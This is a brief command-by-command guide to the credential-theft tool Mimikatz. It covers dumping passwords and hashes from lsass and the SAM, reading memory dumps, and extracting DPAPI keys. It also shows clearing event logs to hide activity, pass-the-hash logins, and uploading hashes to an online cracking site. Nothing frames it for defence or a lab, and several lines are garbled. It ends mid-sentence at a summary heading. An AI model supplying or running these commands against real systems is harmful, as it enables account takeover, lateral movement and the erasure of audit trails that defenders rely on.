To get started, open CMD as an Administrator (Run as administrator). If you don't do this, Mimikatz will not be able to function and gain high-level privileges like NT SYSTEM.
To check if you have elevated privileges, use the following command:
privilege::debug
If you don't have the necessary privileges, you'll get an error message:
privilege::debug {ERROR MESSAGE = not admin}
To elevate your privileges, use open tokens:
token::elevate
If you'd like to save all of Mimikatz's output to a text file, use the following command:
log C:\fool.txt
To extract passwords and hashes from the lsass.exe process, use this command:
sekurlsa::logonpasswords
To extract users and hashes from the local SAM file, use this command:
lsadump::sam
To load an external dump file and work on it, use the following command:
sekurlsa::minidump "C:\Users\username\full_dump_file.dmp"
Then you can extract passwords from it:
sekurlsa::logonpasswords
To stop log creation and then clear them, use the following commands:
event::drop
event::clear
If you have a hash, you can upload it to the following site and try to crack it:
https://crackstation.netTo display the master key the system stores, use the following command:
sekurlsa::dpapi
To use an NTLM hash to authenticate, use this command:
token::elevate sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLMHASH
In this guide, we learned the following: